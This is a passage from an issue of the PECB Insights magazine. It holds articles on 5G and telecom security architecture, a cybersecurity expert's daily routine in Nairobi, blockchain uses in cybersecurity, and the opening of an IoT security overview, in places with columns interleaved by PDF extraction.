was experienced in 2022 by Toyota motors who were forced evolution since the time of NFV is what we call an “Air Gap”
to halt operations across all of its plants in Japan, following problem. What it really means is that we want to keep
an attack on Kojima Industries, which supplies the auto existing security architectures and tune or reshape it to fit
giant with vital parts. the IT and Cloud world.

What it really entails is that merely one view on security is Maybe it would have been nice if we started off from the
not enough, it also means we need to enable new and agile IT world and brought the latest and greatest to meet
methodologies in Telecom around security with "intrinsic Telco service needs. This could mean a more pragmatic
security” as a base and foundation to design and build approach to an operating model as 5G and future networks
any network. will scale.

27
insights.pecb.com

In future networks of 5G, Edge, and Open RAN will be built


on cloud native architectures, building secure products will
not be enough but rather E2E secure data architectures will
be required; “End-to-End Security Architecture based on
intrinsic security will be the foundation of Next generation
Telecom Networks.”

Such an architecture should be based on the following


IN N OVAT ION

principles;

1. Intrinsic Security – Which will mean security in each


layer starting from silicon to supply chain to product
retirement
2. Automation – Which means real time security
insights and security SoC before anything boils up
3. Intelligence – As the frontier of data decade where we
empower ML and AI on a trusted data to a level where
we can make best-informed decisions
4. Orchestration – Which means all the unnecessary
details are abstracted to give a tenant only what it
needs to know

Security Framework for 5G and NextGen Networks


Security requirements and challenges will be wider in 5G
than in previous generations, reflecting the far broader
range of potential use cases and potential threats.

Further contributing factors will come from the way


5G meets the need for higher speed and lower latency
combined with power efficiency needs, a wider variety
of actors and device types, and more use of the cloud
and virtualization.

5G will be built upon network slicing and the “network


of networks” concept. Any security measures must take
both this and edge computing requirements into account.
Below are the security dimensions in 5G:

Multi Access Lightweight security


Security Challenges
Network Challenges

- Massive Multi-Input Multi-Output (MIMO) - Sensitive Traffic Encryption


- Back, mid, front hauling coverage - Connected Nodes Authentication (check)

Distributed User Plane Security at the edge


- Control/User Plane Separation (CUPS) - Virtualized and Containerized firewalls
- Mobile Edge Computing (MEC) - Cloud SDN Security

Programmable Network Strong Isolation


- NFV/SDN based network slicing - Slice Isolation
- Automated service function chaining - Slice Visibility

28
insights.pecb.com

The main security requirements to secure the upcoming As such, service layer mechanisms are defined within
IoT/5G services fall under the following main categories: the domain of the service provider and cover aspects,
such as service authentication, confidentiality, integrity
 Identity Access Management and Authentication protection, and privacy.
 Communication Security  Application layer security: Service providers
 Data Security (Confidentiality, Integrity, Availability) implement their services by providing applications to
their subscribers. In addition to the security provided
These security requirements should be distributed over
by the service layer, each application may implement
the below security layers:
additional or different security mechanisms. These
 Network Layer Security: This layer can be split in two could cover security mechanisms, such as end-to-end
parts: network access (part of the control plane) and data encryption and integrity protection.
network application (user plane). Different types of  Device or Endpoint security: Certain devices are
access, i.e. 3GPP (5G, LTE-M, NB-IoT, etc.), or non 3GPP required to implement security mechanisms in order to
(Wi-Fi, Zigbee, etc.) can be considered. make sure only authorized users have access to device
Under the umbrella of 3GPP, 5G/IoT will benefit from resources and in order to make sure that assets, such
all the security and privacy mobile features, such as the device identifier cannot be manipulated. Those
as support for user identity confidentiality, entity mechanisms are covered within the device security
authentication, confidentiality, signaling protection, layer. In addition, aspects as provisioning the UE with
and data encryptions. service or network access subscriptions, device theft,
Although 3GPP defines several key security device integrity, and grouping of devices (e.g. for bulk
methodologies into its specification, CSPs still need to authentication and management) are covered.
do the provisioning and configuration.
The security requirements should be defined per use case,
 Service layer security: Services can be split into but at the end it follows the CIA triad (Confidentiality,
those that are defined by 3GPP, i.e. 3GPP services and Integrity, Availability), the below are different use cases for
services that are provided by service providers or connected cars with the required security profile level, as
third parties. shown below:

Sector Use case Segment Security Profile

Connected car Vehicle Platform FOTA Mission-critical Very High

Connected car Autonomous driving Mission-critical Very High

Connected car Stolen Vehicle Recovery Massive IoT High

Connected car In-Vehicle Entertainment & Internet Access Massive IoT Medium

29
insights.pecb.com

Cloud Infrastructure Security Based on GSMA FASG and Linux Foundation – Anuket, work
and definition in MITRE framework the Multi Cloud Security
With the future networks based on open and standard
Architectures should address the following needs:
open infrastructure it is important that security is enabled
as a standard foundation in infrastructure that promises 1. Policy controls: where Telco’s can declare the intent
and guarantees SLA for the secure infrastructure, the or policy, and workloads can traverse across clouds
foundation of such a resilient architecture should comprise while complying to that policy SLA’s
of following reference architecture blocks: 2. Real time visibility: where a common data model
IN N OVAT ION

1. Safe BIOS: mitigates the risk of BIOS tampering with approach to capture events and behaviors across all
infrastructures
integrated firmware attack detection
3. Security SoC: where all security related features are
2. Safe ID: protects an IT and cloud infra using biometric
monitored to give both the end-to-end view and also
security
enable a timely response
3. Cloud Security: all the way from TPM to HSM
4. CI/CD of Security Pipelines: which will focus on
4. UEFI Secure Boot Customization: will protect your end-to-end automation of critical activities focusing
infrastructure from security vulnerabilities during boot on continuous security assessments, compliance
5. SafeSupply Chain Tamper-Evident Services: verify monitoring, and security configurations control.
nothing happens to the device during transport. “Finally, the most important piece will be the
These tamper-evident seals are added to the device Operational model because there will be workloads
and the box at the factory, prior to shipping. Pallet that will be distributed across different cloud
seals can also be added to increase security environments in such a case how we can ensure a
consistent single pane of glass.”
6. SafeSupply Chain Data Sanitization Services:
prevent spyware or illicit agents from being injected Below is one holistic view on how Dell Technologies is
into the hard drive supporting customers to deliver secure infrastructure and
7. Data control: using NIST 800-88 standards to ensure security solutions, like cyber recovery, to enable true Multi
even in the case of 5G networks that are hosted on Cloud Era Security Architectures:
Public Clouds, the customers can manage to keep
their data secure and control it
8. RSA Secure ID and remote attestation: to
cryptographically determine the identity of
Baremetal servers CYBER RECOV
Long Term Retention
9. Cyber Recovery for Sheltered Harbor: is a fast, cost- (Object/Cloud Tier) Cyber Recovery
effective, and efficient mean to protect critical data Storage System
Immutable
by adopting the vault mechanism and to recover the
Copies
data in case of a network security attack
OFF PREMISE

10. Network Endpoint Security SafeGuard: will be


needed to detect, prevent, and respond to the full
spectrum of modern cyber-attacks with the least SECU
amount of administrative effort. It applies artificial
intelligence (AI) and machine learning (ML) to
streaming telemetry data to proactively detect and VMs/Containers & Apps DAT
block network attacks
REPLICATION TO
Multi Cloud Security ON PREMISE

5G and Future Networks will follow different and diverse types


of cloud to deliver services ranging from Telco cloud, to IT
Cloud, to Public Cloud Providers, in such a case it is important
to both reliably define security and also give tenants a real
time visibility as it traverses across different clouds.

30
insights.pecb.com

Conclusion
As 5G and future networks are scaling and more services
are being migrated, the “Security” and “data control”
become a central discussion.

However, there is no one standard that fully captures


the Security requirements that can fulfill the unique
requirements of Telecom and vertical industry, it is,
therefore, important to build and define a holistic end-
to-end architecture based on “Zero Trust architectures”
using a data driven approach and automation.

This also means that security must be designed intrinsically


in every layer and then orchestrated to deliver, as a service,
with unique characteristics required by different services
and workloads, in a manner that will accommodate
accordingly multiple fields and industries.

We, as an industry, still have a lot of work to do, especially


by bringing all the Modern Edge and Hyperscaler
architectures to the Telco works in a secure and reliable
manner, however, it is worth mentioning that we have
certainly solved certain issues and have seen and are
seeing some early deployments that prove the fact that the
Open and Modular infrastructures will be the foundation to
deliver a seamless secure connectivity experiences in the
Saad Sheikh
new digital world.
Lead Systems Architect APJ –
Orchestration and NextGen Ops

Saad Sheikh is APJ Lead Systems Architect


for Orchestration and NextGen Ops in Dell
VERY VAULT Telecom Systems Business (TSB). In this

DBs role he is responsible to support partners,


Restore Hosts
NEP’s, and customers to simplify and accelerate Networks
Management transformation to Open and Disaggregated Infrastructures and
Hosts solutions (5G, Edge Computing, Core. and Cloud Platforms)
Midrange
ON PREMISE

using Dell’s products and capabilities that are based on Multi


Cloud , Data driven , ML/AI supported, and open ways to build
next generation Operational capabilities. In addition, as part of
URE AIR GAP Mainframe
Dell CTO team he represent Dell in Linux Foundation, TMforum,
GSMA, ETSI, ONAP, and TIP. He has over 20 years of experience in
the industry in Telco’s, System Integrators, Consulting business,
TA DOMAIN x86
and with telecom vendors where he has worked on E2E Telecoms
systems (RAN, Transport, Core, Networks), Cloud platforms,
WORKLOADS & Automation and Orchestration, and Intelligent Networking.
Tier 1/0 Apps
SERVICES
A dedicated technologist and prolific evangelist with
demonstrated commitment to continuous learning and skill
advancement. Author and creator of numerous articles,
whitepapers, blogs, and informative videos. During his free
time he shares experiences to the community through his blog
channel https://nfvsdn5g.cloud/
31
insights.pecb.com

A Day in the Life of a


Cybersecurity Expert
W ORK- L IFE BA L A N C E

B Y F RA NC I S KURI A

A
s most involved in the cybersecurity field, my day
also consists of a long and tiring schedule, but also
as most cybersecurity experts, I love my job and
this industry. Working towards a better and more secure
digital space is a great motivation each morning. Because
of this field I have had the please, and still do, of meeting
and working with a great array of cybersecurity experts
who have a great deal of experience, however, I still get
to meet and work with a great number of aspiring youth
with a passion for this industry. As it comes with many
challenges, requires a lot of time and effort, studying,
staying up-to-date with all new innovations or potential
threats, and a great deal of time, for many, an imbalanced
work-life schedule, with time away from loved ones and a
lot of focus on work. I am sharing with you a day in my life
and the balance that I have found.

Getting Started
5:20 AM: It starts this early with the annoying alarm
clock emitting a random pattern of beeping sounds. I get
tempted to actually chase after the clock in order to shut it
off, but fortunately, my wife gets to it before I do, and just
like that, the first ‘false positive’ alert of the day officially
checks in. I turn sides and continue sleeping for the next
15 minutes. It happens that the 5:20 AM wake-up alert was
for Jeff, the 4-year-old, whose bus driver will be hooting
outside the gate at 5:50 AM. After he leaves, it will be my
turn out of the same gate at 6:30 AM.

7:45 AM: Thanks to the excellent road network in Nairobi


city, I am at the building entrance in the heart of Nairobi
City (CBD) staring up at the office on the third floor.

I acknowledge that I am about to undertake my official


workout for the day and I cannot help reflecting on my life
before the cybersecurity career, where an hour morning
run from 5:00 AM to 6:00 AM was the norm. I find my way
up panting slightly, but I make it. I also make a mental
check and mark the workout task as complete as I proceed
to open up my laptop. I grab a cup of tea and start a routine
that will take the next four hours.

32
insights.pecb.com

Getting Work Done I will identify and reach out to the established cybersecurity
firms and create a business case for them to consider
I review and reply to emails ranging from security logs to
strategically entering into the untapped East African
admin issues and business development. I complete tasks
cybersecurity market. On the list of benefits that I will
related to the review of the expected receipts, plans for
include in the proposal, to such potential firms, is the need
expenses, follow-up on customer leads and I must say
to tap into the local affordable talent that this part of the
that having had a business background early in my career
world is currently able to produce.
comes in handy, otherwise, I would take the whole day
with these tasks. As an ISO/IEC 27002 Lead Manager, I have to understand
and be able to help organizations implement 93 security
controls (previously 114), and having first-hand exposure
and experience with solution providers that address the
required controls allows me to deliver effective solutions
to customers on consulting projects. At the same time
be a very effective IS auditor, when on an Audit, and
Assurance engagement.

I get to review dashboard reports from a Unified Threat


Management (UTM) platform for all the managed
cybersecurity services customers. I resolve any pending
issues or escalate them as required and communicate the
event or events to each client as per the agreed Service
Level Agreement (SLA). This process is very different for
every organization and is dependent on the maturity of
each organization's security process.

Working Through Lunch


12:00 PM - It is time to rush for an early lunch and get to work
through lunch as I prepare for the cybersecurity training
scheduled at 2:00 PM at one of the partner institutions.

Cybersecurity Training
2:00 PM - I get to work with aspiring cybersecurity
professionals, help them acquire cybersecurity skills
and also get them to pass top cybersecurity leading
certifications. I have to be creative with the instructional
design as the certification exams are recommended for
professionals who already possess some years of experience
in cybersecurity job roles. This is not always the case.
33
34
W ORK- L IFE BA L A N C E insights.pecb.com
insights.pecb.com

Most (about 60%) of those enrolled are recent computer As I alight, I promise myself to focus on good thoughts
science graduates with one year or less in the cybersecurity and leave the challenges of cybersecurity to official
space. To close this gap, I ensure that for each student, working hours.
I provide access to our lab infrastructure that will
simulate real-world business environments, processes,
Finally Home
and IT infrastructures. I will also ensure that they get
access to the latest penetration testing distribution It is now 6:00 PM and I am finally home. I find Jeff in the
tools and finally ensure I provide them access to the top sitting room and after some warm hugs, he quickly invites
open-source solutions, which they will use to protect me to check his new “invention”. It turns out to be a
the IT systems that I have provided to them. I will also combination of my old gadgets (cables, computer parts,
get them involved in the testing and evaluation of our and more related stuff) all precariously connected together
partner products as well, in any ongoing cybersecurity using my tool kit set as the base.
research. At this point, I am more than ready to
I make a good effort to listen to his explanation of how it
call it a day.
works, but as I listen all I can picture is his entire invention
coming down once I take my tool set kit, another example
The Evening Commute of a poor security design. He seems to be no different
from the software and application developers in the
It is 5:00 o'clock somewhere, and it is finally Nairobi's
world who ignore the need to implement secure software
turn. As the “city in the sun” prepares for sunset, it is time
development practices.
to get home to compare notes of the day with Jeff. For the
commute home, I will be using Nairobi’s public transport It is now 6:30 PM and the mom is home. It turns out
which consists of buses referred to as "matatus", very that this is the best time to pull my tool set kit from the
colorful with most having all the colors of the rainbow in invention. I will have a good laugh when I see the invention
a perfect balance, served with blaring music and branded come down. I also understand that I am about to start
with posters of legendary American rap artists as well as the final official workout of the day as I have to run as
free Wi-Fi on most of them. fast as I can.

Once inside, my attention is drawn to an IP camera at I will eventually get caught, just as it happens in the
the front, and just as I thought that cybersecurity work real world where getting hacked is a matter of when
was done for the day, I find myself where we all start, not if. And just like that, I will be looking forward to the
i.e., information gathering phase (Wi-Fi name and challenges of the next day.
password name in plain sight), I find myself asking the
question, “What other devices are connected in addition
Francis Kuria
to the IP camera?” Cyber Security Lead | CLEH,
CEH, CISA, ISO/IEC 27001
As I am about to jump to the weaponization phase, I make Lead Auditor
a quick glance around the bus, first at the young man
sitting next to me who has been engaged with his phone Francis is a cybersecurity lead who
the entire trip. lives in Nairobi, Kenya, with his
wife and 4-year-old son. He holds
His phone seems capable of handling advanced mobile a Master’s Degree in Information Systems from the
University of Central Oklahoma (USA). His current
penetration testing tools and I start thinking of what he
industry certifications include: Certified Lead Ethical
could be capable of accomplishing.
Hacker (CLEH) from PECB, Certified Ethical Hacker
(CEH) from EC Council, Certified Information Systems
I, now turn to the other passengers and start asking myself, Auditor (CISA) from ISACA, ISO/IEC 27001 Lead
“Are the hackers here?”, “Have they already taken over the Auditor (PECB), ISO/IEC 27002 Lead Manager (PECB),
IP camera?”, I question the thoughts in my head and even Network+ Certification (CompTIA), A + Certification
start asking myself if a medical doctor happened to be (CompTIA) among others. Francis is a PECB Certified
Instructor and serves as a mentor, helping individuals
on board, whether he would be sitting around imagining
navigate their careers in cybersecurity. His dream is
how one of us would look like after multiple fractures from for a robust cybersecurity framework for Africa. And
an accident. After that thought, I immediately stop and when not in the office, you will find him working
fortunately it is time to alight from the matatu. in his beautiful garden.

35
This upcoming PECB Insights Conference is an especially noteworthy event,
marking a return to in-person conferences after a three-year period! Designed
to ignite and inspire, this event will feature various new and exciting makings,
where you will be able to see all the trends, influences, and inspirations of this
decade, and where you can connect with C-level professionals.

This conference will host over 40 experts who will be discussing the latest trends
and developments in the world of Information Technology, Security, and Privacy
– with topics surrounding Information Technology, Digital Transformation,
Artificial Intelligence, Blockchain Technology, and much more.

Save the date for the PECB Insights Conference 2022 sessions, scheduled for
17-18 November!

Set to be held in the memorable city of Brussels, this event not only includes
two full days of interactive and immersive sessions but also features two Pre-
Conference Intensive Training Courses.

We are happy to let you know that we are launching the following Training
Courses as part of the Conference in Brussels from November 14-16:

ä Digital Transformation Intensive Training Course


ä Lead Crisis Manager Intensive Training Course

These Pre-Conference Intensive Training Courses will be delivered by two highly


distinguished trainers with extensive backgrounds in their fields:

ä Rinske Geerlings
ä Graeme Parker

These sessions and courses will convene the world’s most influential and
brightest minds across industries. By building bridges between specialists and
experts from various industries, we aim to create a community that is inclined to
embrace changes and join forces toward a safer world.

Mark your calendars, as we look forward to seeing you all there!


insights.pecb.com

The Use of Blockchain in


Cybersecurity
B Y RUD Y S HO US HA NY
T H E E XPE RT

T
hese days cyber-attack trends are increasing in
magnitude, frequency, and sophistication constantly.
In recent years, we have witnessed escalated cyber-
attacks, such as distributed denial of service (DDoS)
attacks, phishing, ransomware attacks, man-in-a-middle
(MiTM) attacks, SQL injection, and much more, aimed at
major networks like Mailchimp, LinkedIn, Canva, Google,
Amazon, CNA, WHO, etc. It is safe to say that as technology
evolves, so do the bad guys.

The most recent cyber-attacks were launched by nation-


states, hacktivist groups, and lone-wolf hackers. Cyber-
attacks render a significant threat to government agencies,
businesses regardless of size, and all internet users.

Hence, birthing the need for tight cybersecurity to protect


online networks from digital attacks on sensitive data,
information, and transactions.

In April 2022, email marketing company, Mailchimp


revealed that its system was hacked and information was
exported from the platform's accounts. This affected users
such as Trezor and Bitcoin's wallet, whose newsletter
database is hosted on Mailchimp.

In March 2021, insurance firm, CNA experienced a


ransomware attack where the company had to pay a
settlement fee of $40 million to retrieve their stolen data.
The attack also logged employees out of their systems and
blocked access to corporate resources.

In October 2020, Google announced the details of a major


cyber-attack against its servers in September 2017, to
the public. According to the report, the incidence was a
distributed denial-of-service (DDoS) attack that lasted for
over six months.

Thus, topping the record as the biggest attack of its kind.


Undoubtedly, hackers hide behind the decentralized nature
of the internet to keep their anonymity and overcome any
opposition to their attack.

38
insights.pecb.com

For instance, a DDoS attack will first, infect multiple nodes Blockchain technology is equipped with multiple features,
across different domains to produce a semi-coordinated configurations, and applications specific to improve
network called a “botnet.” Hackers then hijack each bot security. Configurations including public and private
and launch them against centralized targets. cryptographic keys, contracts, and identity control ensure
data protection through verification and authentication of
Meanwhile, other ways to make centralized targets less transaction records, privacy, and traceability maintenance.
vulnerable include database management, increased
software deployment, security protocols, and depending Blockchain technology is trustless and consensus-focused,
less on central "trust." which distributes transaction records across a network of
computers.
The decentralized solution relies on blockchain
technology to increase the resilience of cybersecurity. Thus, shifting record-keeping and transaction verification
processes from a central authority to a decentralized
network. Thereby, removing the single point of failure, thus,
enhancing resilience to attack and security.

5 Uses of Blockchain in Cybersecurity and Privacy


1. Decentralization of Data

Due to blockchain's consensus nature, data stored on-


chain are tamper-proof, blockchain-based storage
solutions will help achieve decentralized storage that will
secure digital data.

2. IoT Security

Blockchain technology can be used to maintain


cybersecurity in the IoT system by apportioning operation
and administrative controls away from central authority,
enhancing device-to-device encryption, and key
management techniques to secure data. Distributing
information redirects users when a centralized database
is hijacked.

3. Software Authentication

Blockchain is perfect for verifying updates to detect and


stop malicious software from sabotaging the devices.
Companies can use blockchain hashing to verify patches,
updates, and downloads to prevent chain attacks.

4. DDoS Attacks Resistance

The most common and potent cyber-attack is the DDoS


attacks, which hit Google and Amazon. Distributed denial
of service (DDoS) attacks are launched to hijack the traffic
on a targeted network or service by spamming it with false
requests from different infected bots. These attacks are
decentralized in nature.

However, blockchain's decentralization and immutability


solution will be 'beating the hackers on their game' as it
efficiently bypasses these attacks.

39
insights.pecb.com

5. DNS Security

Like a public directory, the Domain Name Server


(DNS) connects domain names to their IP addresses.
Decentralizing DNS Security can ensure the domain names
are tightly secured and beyond reach during a DDoS attack.

The Benefits of Blockchain in Cybersecurity


T H E E XPE RT

1. Eradicates single-point failures

Unlike centralized structures, data is decentralized on


the blockchain, thus, one node failure can hardly disrupt
the system. Therefore, not even DDoS attacks (which are
unlikely to happen to a decentralized structure because of
insane computational cost) can compromise the system.

2. Transparent and traceable

Blockchain's transactions are trackable due to its accurate


record-keeping. Each transaction is verified, recorded,
and digitized across the network for transparency.
However, in blockchain, once these keys are lost, they
3. Reliable transfers
are irrecoverable, meaning that encrypted data could be
Blockchain is ideal for authenticating data transfers. lost forever.
Here, smart contracts play a vital role since they execute
3. Blockchain literacy
instructions (in this case, transfer) once pre-set
agreements are met. Although blockchain technology has been around for
over a decade, understanding its concept requires deep
4. Efficient storage
knowledge of some tools and programming languages. As
Once records are verified and stored on the blocks, they a result, few blockchain developers are readily available.
become unchangeable. This blockchain’s immutability
4. Complexity and costs
keeps the data entries safe in a manner never seen before.
As expected, blockchain technology is very complex and
5. User confidentiality
comprises of many nodes and computers actively working.
Blockchain's built-in cryptographic key features ensure This inadvertently requires high computing power and storage
user confidentiality across all networks. capacities, which in turn causes high transaction fees.

5. Satellite development ecosystem


Drawbacks of Blockchain in Cybersecurity
Though blockchain is secure, more and more security
1. No governance efforts and focus should be put on satellite development
around the blockchain, which we are seeing being
Even though blockchain is bubbling with use cases virtually
compromised more and more.
in all industries, it lacks global regulations.

2. Irrecoverable keys
Final Thoughts
Keys (private and public) are to blockchain what keys Cyberattacks like data breaches, DDoS attacks, phishing,
are to cars. These private keys enable device-to-device ransomware attacks, etc are cause for alarm especially
data encryption. But what happens when a driver as the attack keeps evolving with technology, growing in
loses his car keys? The car becomes inaccessible. volume and frequency.

40
insights.pecb.com

The financial impact cost thousands of victims millions


of dollars yearly. We are seeing more and more utilization
of Blockchain use cases, government agencies and
companies must join hands in cyber warfare by looking out
for ways to counter or prevent these attacks.

Employing Blockchain's decentralization feature will


not only prevent these attacks but pay the bad guys in
their coins.

Rudy Shoushany
Founder of CryptoTaks
and DxTalks

Rudy has a wide experience in the


Information Technology field in the
financial sector with over 20 years
of experience, which gives him
the ability to aid organizations. His specialty is ICT
Governance, Compliance, Strategies, and CyberSecurity
in the Digital Transformation of fintech.

Rudy is a Certified professional with many achievements


and awards, skilled in executive leadership. He has been
an active speaker, Board Member, coach, and mentor
for startups. He is the Host and Moderator of the DXTalk
Series, a Digital Transformation talk show. Which has
lately been selected as top 50 Global Thought leaders
and Influencers.

41
insights.pecb.com

IoT Security: Definition,


Threats, Issues, Defenses, Tools,
and Importance
L E A D E RS H IP

B Y C HRI S TO P HE R M A G NA N

I
Definition
nternet-of-Things (IoT) security integrates processes
and tools that defend networks from cybersecurity
threats. These threats continuously evolve and exploit
IoT device’s vulnerabilities. Proactive threat analysis and
risk mitigation strategies counteract these threats through
policies, technology, and people. IoT networks are diverse,
so a single strategy or industry standard will not apply to all
networks. Device (also called endpoints, nodes, or sensors)
manufacturers design are not forced to comply with
security standards, old devices with outdated technology
are integrated into the IoT network, devices are placed
outside a secure perimeter, different communication
protocols, and ad-hoc reconfiguration increase IoT security
complexity. This article will summarize recent adoption
trends, list common security threats, present underlying
IoT vulnerabilities, recommend risk mitigation strategies,
and present common security tools to strengthen the
IoT security posture. Given the breadth of this article,
references have been hyperlinked to aid further analysis.

Significance
IoT technology has catalyzed global digital transformation,
identified in many reports as the greatest business
driver. Corporations harness the technology to improve
processes, develop new capabilities, quickly pivot to new
markets, or compile data for strategy development. Smart
cities, smart homes, telehealth, and industrial automation
are applications driving this adoption. Consumers now
rely on IoT to improve daily habits, automate home
appliances, and for entertainment. Technology adoption
has accelerated despite supply chain disruptions, a global
semiconductor shortage, and the COVID-19 pandemic.
Technology catalysts include decentralized processing
capability, cloud computing, cheap hardware, wireless
spectrum access, and scalability.

42
insights.pecb.com

Reports estimate that 12.3 billion IoT devices exist on Threats


networks and predict 14.4 billion devices in 2025.
In addition to the short-term damages mentioned
above, hackers can cause long-term damage once they
Despite the explosive growth, IoT security has not kept
access the network. The following threats have been
pace with technology adoption. The devices themselves
repeatedly identified.
pose many security risks: poor password management,
software is not properly updated, and many devices lack Malware is a type of attack that occurs when software is
security features. Users also do not adopt best security installed on a network device. The malware could take
practices since they are not held accountable, nor do they the form of a worm or virus that potentially infects other
properly understand the risk or how to manage security. network components and servers. Malware can be used
Effectively, network security is as strong as its weakest to deny access to critical components, gather sensitive
link. Therefore, hackers view IoT as the bridge into the data, or corrupt system automation. If a hacker can
enterprise network. For example, a Las Vegas casino’s access an IoT endpoint, the malware will be installed
network was compromised through an unprotected on that sensor. Historically, malware was distributed
aquarium temperature sensor, this sensor was part of through e-mail attachments that required unsuspecting
a third-party system design that was not reviewed for people to open them.
cyber readiness and actively managed by the Information
Botnets are distributed malware used across an endpoint
Technology (IT) team.
array to disrupt a portion of the network. Botnets are
Hackers who are motivated by financial gain, revenge, or typically used for denial of service (DoS) attacks or transfer
politics, can cause significant damage once they access the enterprise command and control to the hacker. The hacker
network. Users can experience injury, death, financial loss, will install the malware on one node, which then infects
other nodes with the malware. Removing this distributed
damaged reputation, corrupted data, data theft, data loss,
attack will require remediating each infected node.
and service disruption. Corporations must protect personal
data including credit card info and Personally Identifiable Ransomware is a type of malware that will lock out system
Information (PII). Once compromised, corporations must users and administrators until a payment (ransom) is made.
reach out to their customers and remedy the breach. Command and control could also be transferred to the
Recently, hackers have targeted medical IoT during the hacker and increase the urgency and motivate immediate
COVID-19 pandemic to compromise data or disrupt medical payment. An example is the compromised vehicle where
devices, such as insulin pumps. Ethical hackers, in an the hacker will control a compromised vehicle until the
exercise to demonstrate a connected car’s vulnerability, payment is sent. The Baltimore City government and
were able to access the car’s network and remotely control Atlanta City governments were affected by this type of
the brakes, the car’s acceleration, and door locks. attack between 2018 and 2019.

43
insights.pecb.com

The following two threats are exclusive to sensors and Skills critical to maintaining the security posture include
hardware located outside the security perimeter (also hands-on experience with tools, technical writing,
identified as defense-in-depth). system design, data analysis, and technology lifecycle
management. Traditionally, cybersecurity professionals
Physical theft is the removal of the endpoint or started in information technology (IT) and transitioned
infrastructure from its location. Most likely the network into cybersecurity. However, Generation Z and Millennials
will not be accessed through the stolen node, but service have completed self-paced or university education to
continuity is at risk if it is used to relay data from other enter the profession but lack technical acumen. Finally,
L E A D E RS H IP

endpoints or commands from the enterprise. analysts show that cyber professionals are predominantly
male (76%) and Caucasian (72%) in the United States and
Reverse engineering techniques will examine the stolen the United Kingdom. These three trends quantify severe
hardware to replicate the node design. The design can be limitations with current hiring strategies.
manufactured and integrated into the network to collect
network data or distribute malware across the network. Budgets are also not keeping pace with accelerated IoT
adoption. An executive survey reports IoT cybersecurity
spending will not increase year over year (YoY). Budgets
Issues
limit staffing, tool acquisition, training, corporate culture,
Analysts report that IoT adaptation has exceeded and risk management capabilities. Recent inflation further
growth expectations. However, IoT security has limits budget and spending impact. Executives also need
lagged the accelerated technology deployment; many to identify critical vulnerabilities that pose the greatest
systems are deployed without any cyber readiness or corporate threat and dedicate resources to mitigate risk.
vulnerability assessment. The underlying concern is an
exponentially growing vulnerability gap that also has IoT nodes can range from simple sensors that digitize and
exceeded projections. transmit data to complex command and control systems.
Endpoint design standards do not exist and designs
Common causes leading to the gap are designs, sensor range in processing capabilities, local storage, firmware,
security limitations, asset management, corporate policies communication protocols, and memory. Unfortunately,
and procedures, and education. security features are not a design requirement and it is
the responsibility of the system designer to implement
Rapid adoption also requires technical talent capable security controls. Many manufacturers also do not update
of managing enterprise assets. However, the necessary software nor release patches to mitigate discovered
talent pool size is also not growing proportionally. As stated vulnerabilities. Nodes with patches and new software have
by an ISC2 report, analysts estimate a global 2.7 million finite processing power, memory, and storage that limit
cybersecurity professional shortage in 2021. data collection or processing while upgrading software.

44
insights.pecb.com

In many IoT systems, IoT nodes are located outside In the event the network breach is caused by an unknown
security perimeter and communicate via unregulated sensor, forensic analysis and an incident management
wireless channels in the Industrial, Scientific, and Medical remediation plan will be unable to quickly quarantine the
(ISM) bands. Wireless transceivers in these bands are affected sensor and mitigate damage.
commercially available and access barriers do not exist.
Hackers actively exploit the vulnerabilities through the Corporations adopting IoT typically lack system design
wireless channels to penetrate the network. expertise and outsource the project to engineering firms.
One common mistake is omitting a cyber professional’s
Consumer IoT adoption is also a developing vulnerability. design assessment of its cyber readiness. Cyber
Employees link their wearables (such as biometric trackers) professionals can also advise on asset management,
and virtual assistants to both public, home, and enterprise event management, and cyber awareness training.
wireless networks. Consumers are predominantly ignorant Unfortunately, cyber specialists are in high demand, and
about cybersecurity and poorly managed risk. Wearable adding them to the design team significantly increases
manufacturers rarely design security features nor update project costs. Finally, policies to assess cyber readiness
operating software to patch vulnerabilities. Since personal continuously through audits are not implemented to
devices are not corporate assets, they rarely adhere to improve the security posture.
enterprise compliance and risk mitigation standards.
Recent surveys have also reported password management
According to ArchonSecure, recently, many older is a significant IoT vulnerability. In many sensors,
endpoints have been integrated into IoT networks. This passwords are never implemented nor changed from
practice is common in manufacturing facilities that do the default one set by the manufacturer. Because many
want to disrupt optimized industrial processes. These sensors are not managed by the IT, corporate policies for
nodes are no longer supported by the manufacturers password complexity and periodic password changes are
and operate on antiquated firmware that predate basic never enforced. As a result, generic or default passwords
security features. In many corporations, the assets are are easily deciphered.
not managed by the enterprise IT team but are managed
by industrial engineers or facilities maintenance. Many
sensors operate on outdated communication protocols,
such as RS-232, that are not compliant with internet based
schemas, such as Transmission Control Protocol (TCP) or
User Datagram Protocol (UDP). To effectively communicate
with the corporate network, these sensors are connected
to aggregators which translate data and commands from
multiple sensors between the native protocol and the
network. This strategy increases network vulnerability
because these sensors do not have an IP address and are
isolated from asset and configuration management tools.
This isolation compromises asset management since the
legacy sensors are often not properly catalogued, managed,
and decommissioned when the system is permanently
removed from service.

Executives have identified broader IoT asset management


as a vulnerability. In addition to the deficiencies mentioned
above, new designs and capabilities are not properly
reported to the Enterprise IT staff nor the cyber team.

The endpoint vulnerabilities are not properly analyzed


and risk mitigation strategies are not developed and
implemented. The endpoints’ risk profile also increases
as critical software updates and security patches do not
propagate to the network edge.

45
insights.pecb.com

Business leaders are also concerned with the lack of cyber Defenses
awareness and accountability. Trending vulnerabilities
Countermeasures to mitigate the risks listed above involve
are not disseminated to employees. Also, employees’
processes, people, and tools (e.g. technology). Processes
cyber awareness is not audited, and refresher training
define the expectations and the sequences implemented
is rarely presented. Employees also develop risky habits,
to improve the security posture. People need to be trained
for example, people who telework may travel overseas
to follow processes and management’s expectations. Tools
and work from unsecured locations with public WiFi. In
aid people with event detection, enforce policies, and
addition, employees should be held accountable for IT
L E A D E RS H IP

evaluate cyber readiness.


assets issued to them, such as corporate keycards or
laptops. Poor management, for example, such as leaving A cyber champion or evangelist is needed in many
assets unsecured in a public space, is a significant risk, organizations to improve their security posture. This
since they can be lost or stolen. Unfortunately, many person should be the face of cybersecurity within the
security concerns remain unreported and violators are not organization. Key messaging disseminated throughout
held accountable. This behavior empowers irresponsibility. the organization should highlight potential improvements
to mitigate security gaps, success metrics, any recent
With the recent COVID-19 pandemic, business operations security events, and any lessons learned. From an IoT
have transitioned from offices to homes. Cyber risk has perspective, the evangelist should focus on implementing
also increased with employees using corporate assets on a strong cyber awareness that is reflected in the system
home networks with unsecured IoT controls and sensors. lifecycle, cyber readiness evaluation, event management,
Since corporate IT does not have the capability to manage and training programs.
employees’ home devices, they cannot quarantine,
